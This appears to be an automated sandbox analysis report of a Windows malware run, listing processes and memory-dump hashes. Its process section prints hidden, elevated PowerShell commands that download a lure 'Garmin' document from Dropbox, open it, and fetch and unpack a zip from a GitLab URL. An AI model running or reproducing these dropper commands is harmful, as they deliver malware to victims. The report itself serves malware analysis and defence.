                                                                                                                                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                                      Imagebase:0x7ff696020000
                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:11
                                                                                                                                                                                                                      Start time:13:43:57
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2vtguj371ghesdeeygeie/Garmin_Campaign_Information_for_Partners_V6.docx?rlkey=5epffuh4p11572mmaj6rgumtn&st=a77woigz&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx')"
                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:12
                                                                                                                                                                                                                      Start time:13:44:04
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V6.docx'"
                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                      Start time:13:44:05
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/fgsd1/gg/-/raw/main/FGa1312.zip', 'C:\Users\Public\Document.zip')"
                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                      Target ID:18
                                                                                                                                                                                                                      Start time:13:46:00
                                                                                                                                                                                                                      Start date:17/12/2024
                                                                                                                                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                      Commandline:powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                                                                                                                                                                                                                      Imagebase:0x7ff788560000
                                                                                                                                                                                                                      File size:452'608 bytes
                                                                                                                                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                      Reset < >
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1746870356.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 9dd6f249eb3ec146a391505259a022479118ddfdaf1e35a9a295c0099e7f16b1
                                                                                                                                                                                                                        • Instruction ID: 679a4c170283d40f237745e161faa652071c72ea5346c5bcbc4d9e079a6d272e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9dd6f249eb3ec146a391505259a022479118ddfdaf1e35a9a295c0099e7f16b1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1CD14572A1FA8E5FEBA99BAC48755B57BE0EF11310B0901FED05DC71E3DA18A905C341
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1746870356.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 83bd53a5b7504ca8560a88d029cfce4db7635781bf2adf1a4061f8bebb4e4218
                                                                                                                                                                                                                        • Instruction ID: 9c2a66e2cfaa1dd142955fa5923d2ec7536ab345f7f015b43e03b99f2ce7d79d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83bd53a5b7504ca8560a88d029cfce4db7635781bf2adf1a4061f8bebb4e4218
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9D12422A1FBC95FE7A6977848B51B43FE1EF53650B0A01FFD089C70E7E91869068342
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1746870356.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: b239972b9cfa7051725d818c09d400e2f4ca4b9130c856679a4c8da654659bf4
                                                                                                                                                                                                                        • Instruction ID: 37598b4f3dab63169c5e5b4086e3161182c5b149c2b9228e97d54cd3c74c8510
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b239972b9cfa7051725d818c09d400e2f4ca4b9130c856679a4c8da654659bf4
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B31F822F2FB8B5FEFB9977804F517867C2EF51A5574A40BED05DC61E6DD0969008301
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000B.00000002.1746630655.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                                                                                                                                                        • Instruction ID: 909ac052c9689ffea5fc7f355afe2fbbefd9078f17e9db7b1e03edb0d32e9456
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C01A73020CB0C4FDB48EF0CE451AA5B7E0FB99320F10056DE58AC36A5D632E881CB41
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.2897936559.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 655acce9083ebc842c18c1e6b308ac3d50c5b25f036d18b8f8434f1207ff9caa
                                                                                                                                                                                                                        • Instruction ID: f4daa0f70c29cb21cd67372b81cb0842252a4e65e416f7ffc3d38c87b4c962b2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 655acce9083ebc842c18c1e6b308ac3d50c5b25f036d18b8f8434f1207ff9caa
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4CC18E30A18A5D8FDF98DF9CC4A5AADB7F1FF68300F15426AD419D7295CA74E881CB80
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.2898547331.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bb80000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 8896ba4c6ac11b763240e051f16fc682a935efe195e07479715716b9fdbf246d
                                                                                                                                                                                                                        • Instruction ID: 116c85771d0e5ac2058385b6a64b0d1393c9a769c03bfd5529839f9223a2f2a2
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8896ba4c6ac11b763240e051f16fc682a935efe195e07479715716b9fdbf246d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B251F622B0FE4A0FE7B9A66858721B973D2FF41658F9900BED55DC31F3DD29A9018381
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.2898547331.00007FFD9BB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB80000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bb80000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 284de90aae11fd17424c0df16f1481d4681932ffb60f4c84d5e6686ef0dcc13b
                                                                                                                                                                                                                        • Instruction ID: 96ebb3fe43a007f399209ddb3e9839b3353572951794ca343ef1178e6791bf9f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 284de90aae11fd17424c0df16f1481d4681932ffb60f4c84d5e6686ef0dcc13b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A831E722B0FE8A0FE7B9A698147517C72D2FF4169DF9900BED15DC61F2DD29A8018701
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000D.00000002.2897936559.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                                                                                                                                                        • Instruction ID: ed7389282a79b494049f6613502ab29737edd8baed6d6b3c015a0a18e7730562
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3e6ffc2d01485e3675e6a7ede7ef7c0dc479045d5709cc38633428d358b59bad
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E01A73020CB0C4FD748EF0CE051AA5B3E0FF95320F10056EE59AC36A5DA32E881CB45
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: fP_L
                                                                                                                                                                                                                        • API String ID: 0-301733203
                                                                                                                                                                                                                        • Opcode ID: 10bf727214ec3c1f973c7672bcf5ace615d3549aa5f83dba9d4a769865dfcdc3
                                                                                                                                                                                                                        • Instruction ID: 15a2f52cfb945bb890a5469ba2e92c945067593d8bbf4f847d2b8d23f26d7605
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10bf727214ec3c1f973c7672bcf5ace615d3549aa5f83dba9d4a769865dfcdc3
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A224E3460894D8FDF98EF5CC898AA977F1FF68305B0502A9E85ED72A5DA35EC41CB40
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                                                                                                        • Opcode ID: 6d258122ed037aeff471ef15035c52f44efe32add062259480c8fc37819a802a
                                                                                                                                                                                                                        • Instruction ID: 3cdafeb28e176d1da0ca68a475349859510713fdffb65e23751344d4c4ffb4c6
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6d258122ed037aeff471ef15035c52f44efe32add062259480c8fc37819a802a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF91493170DA5D4FD764EB6C9825AB67BD1EF89320F1502BBF48DC72A6C9289D428381
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID: s:
                                                                                                                                                                                                                        • API String ID: 0-640640795
                                                                                                                                                                                                                        • Opcode ID: 0e9c01690890a4c76d3c09566daf95d7e83ed1b025904e41acb047bef004b1dd
                                                                                                                                                                                                                        • Instruction ID: 7a46c94856e7da8fe6fc889bd4129fb2af6314df74cbe85fd3cacc78c6de1af0
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e9c01690890a4c76d3c09566daf95d7e83ed1b025904e41acb047bef004b1dd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C941AE20B0D90E4FEBA8E7AC9464AB563D1EFD8324B150679E04EC32B6DD68FD818740
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 7a5d2a89929ee65d9939bb028b4024bbb6e53d5d077a1207ffd5bc5a1f8f138e
                                                                                                                                                                                                                        • Instruction ID: a19cb17545c63999dd0ac976ea6590b4a9bce307d8a0b586c272a08617dfe553
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a5d2a89929ee65d9939bb028b4024bbb6e53d5d077a1207ffd5bc5a1f8f138e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 20A11921F1D91E4FFBA8AB6848757BD62C2EFC8354F464279D04EC32E6DE6DA9024341
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 0c83c8018d460d7e7428111e3cea924dfb4e4cf89cdfa4f1f2024972d908c115
                                                                                                                                                                                                                        • Instruction ID: d73b89b459c413a72eb31a00bae95dfac8990cb44a9fa743a7bb825a3b86502d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c83c8018d460d7e7428111e3cea924dfb4e4cf89cdfa4f1f2024972d908c115
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A0719321F19D1E4FEBA4EB6C84656BD63D2FF98710B414379E45DC32F6DE28A9428380
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: cd27442005f60e1cb64904c7028f9bdbbc6e0ba5b7ade87db9b62f7914b10aae
                                                                                                                                                                                                                        • Instruction ID: 044b1801c30d86d1d334bf04ee6b98d35d72f1206c0c695d4c7a4b5b999b2729
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd27442005f60e1cb64904c7028f9bdbbc6e0ba5b7ade87db9b62f7914b10aae
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0E51F730709A4D4FD7A4DF6CD868A657BE1FF4831170601BAE489CB2B6DA64EC85C781
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 1a97742e3fdf077212eeee55ccd953de415955c94ca4b31e385c728e1d19b067
                                                                                                                                                                                                                        • Instruction ID: 7472537016ab6748cddb673403aab9c713189c53cd19c472a6dfd5c4cf066140
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1a97742e3fdf077212eeee55ccd953de415955c94ca4b31e385c728e1d19b067
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E151E731B0D91C4FDB68EB5CD8A56B973E1EFD5310F4102BAD84ED72A6CD24AD028781
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: ffa8c27291ef7449091a4ad796f6e146a64607b476088c3d5ad866183ca46a92
                                                                                                                                                                                                                        • Instruction ID: 2c4aa5202df2139f791755e244230468b3b65789fe79cbd0002805cf22139e7c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffa8c27291ef7449091a4ad796f6e146a64607b476088c3d5ad866183ca46a92
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E513730B0E55E4FE769DB6888352B937E1EFC5310F4602BAE449C71E2DE685E458381
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                        • Instruction ID: e75163938e095967fa76fcab04e038a6d60a0d16d81199ef5e924a3523dd080d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c9be9dbbce76e3b74867bd260c1f0f9682bc99ce66385624e915fade1d417fdd
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2441E63131581C8FDAA4EB5CE898E6877E1FF6831271605E6E44ACB271DA66DC81CB40
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 6a4a666ebdf066b3d4d67aa44a3a86f2bd9af38934754d0f5aef3981e365e3cc
                                                                                                                                                                                                                        • Instruction ID: 8e4b19c9dcf198b58b58f74de012841d6ae27366f8731fc4b7877c9b2057d3bc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6a4a666ebdf066b3d4d67aa44a3a86f2bd9af38934754d0f5aef3981e365e3cc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E341B531B0990E4FEBA8DB5894257BD77E2EFD8350F51027AE40DC32E2DE685D414781
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: f589f3173b5c8b97f37884003edc7a4d4cc87f452249fc5765e03f452e0e84a9
                                                                                                                                                                                                                        • Instruction ID: 494e417e532abaa0646e97b566e867b0581bab067beace50bb53c1e365a88391
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f589f3173b5c8b97f37884003edc7a4d4cc87f452249fc5765e03f452e0e84a9
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F414B21B0DA090FE7A4A77C58696BA7BD1DFD9270B05067FD44DC32F2DC5969428341
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 4d31ab177822a898b92e65be08d75f6691025e834b219cab63a0c1f607de078a
                                                                                                                                                                                                                        • Instruction ID: e63205f6f45c6a5d8093cca014ceaa3b2d4ff9f368bc39d987a912440e2a5b24
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d31ab177822a898b92e65be08d75f6691025e834b219cab63a0c1f607de078a
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D541C431F0A90E4FEBA8EB6894257F936E1EFC8310F41027AE41DC32E5DE695E418781
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: 20831808e25e57b6bd7a6d84710f58ac09e165d856e0fc825948328a99724742
                                                                                                                                                                                                                        • Instruction ID: 351d39417694528a29e4646df8543959345ca82eabeb74bcc57f91d7e81244c7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 20831808e25e57b6bd7a6d84710f58ac09e165d856e0fc825948328a99724742
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BC31E330B1980E4FDBA8DB6CC464B6977D2EFC9360F4542B9D04EC72A6CE58AC82C740
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: d3fc012f4c188483a77a664dcfdb8740c58e10c4048d7d731eb5dd51c7400e14
                                                                                                                                                                                                                        • Instruction ID: a658a30ac0b380113793ba6718e910c3f07841ba370542b1a00ecc706f6d124d
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3fc012f4c188483a77a664dcfdb8740c58e10c4048d7d731eb5dd51c7400e14
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D431A531B0950E4BEBA8EB5894257FD77E1EFD8311F41023AE40DD32D5CE696D418681
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000012.00000002.2980682078.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ffd9bad0000_powershell.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                        • Opcode ID: c9ff5ca5965585250dfad1a522fb12c8fee0cb1d132eb0d4ec38917ed1960cad
